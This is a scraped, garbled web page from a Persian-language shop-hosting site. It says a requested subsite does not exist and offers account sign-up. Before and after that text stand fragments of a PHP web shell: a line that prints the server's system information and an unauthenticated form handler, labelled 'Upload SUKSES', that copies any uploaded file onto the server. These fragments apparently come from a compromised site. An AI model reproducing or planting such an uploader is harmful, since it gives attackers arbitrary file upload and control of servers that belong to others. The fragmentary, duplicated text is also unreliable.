'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>

در چند ثانیه برای خودتان در فروشگاه های همدان 24 حساب بسازید


(حداقل باید از ۴ حرف باشد٬ فقط اعداد و حروف)
ما ایمیل نام‌نویسی شما را به این نشانی ارسال می‌کنیم. (پیش از ادامه دادن، مجدداً نشانی ایمیل خود را بررسی کنید)


سایتی که به دنبالش می‌گشتید، http://farshkhatereh.hamedan24.ir/ وجود ندارد، اما می‌توانید همین حالا آن را ایجاد کنید!

رفتن به بالا


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>